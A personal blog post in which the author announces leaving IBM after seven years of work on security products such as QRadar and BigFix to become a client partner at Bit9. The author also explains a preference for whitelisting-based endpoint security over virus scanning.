As of February 1st, I will be leaving IBM. It's been a great 7 years. I never thought I could enjoy working for a large company, or working so long in the same position. Man was I wrong. IBM really has some great people, and I had the best quality of life during my tenure. Even though I was in the same position, life was rarely dull with constant acquisitions (nearly one per year that affected me!). I started off working with NeuSecure/TSOM, then TDI, then TCIM, then TSIEM, then AppScan, then Proventia and SiteProtector, then BigFix/TEM, and finally QRadar. That's a busy seven years!

Well, what's next? I have accepted a position at Bit9 as a client partner. I am excited about this on several fronts. One, I think the technology is amazing. I've never been a big supporter of virus scan products. They just never seem to offer adequate protection. Bit9's approach is to whitelist the good stuff as opposed to trying to find all the bad stuff. I really think this is a better way to secure endpoints. I'll be posting more on my security philosophy soon.

Secondly, I'm excited to be moving to a small company. Not only is moving to a start-up* exciting, the people there are too. Everyone I've talked to so far seems to be on the same page as me when it comes to security philosophy and business philosophy, and they look to be very fun to work with. I was lucky to find a good crew at IBM, and it looks like my luck continues at Bit9.

Also, the client partner role looks to be very fulfilling. When I look back on my time at IBM, I really enjoyed the time that I could form long-term relationships with my customers. That's also where I found the greatest success. This position looks to mix engagement management, relationship management, and technical account management. I'm also planning on doing some evangelist work too.

I am so excited to get started at Bit9 in February. I will have to spend some time deprogramming myself as an IBMer, but I think this is a good move with a good company with a great product.

* Bit9's been around for about 7 years and can hardly be called a start-up anymore. But every company seems like a start-up when coming from IBM.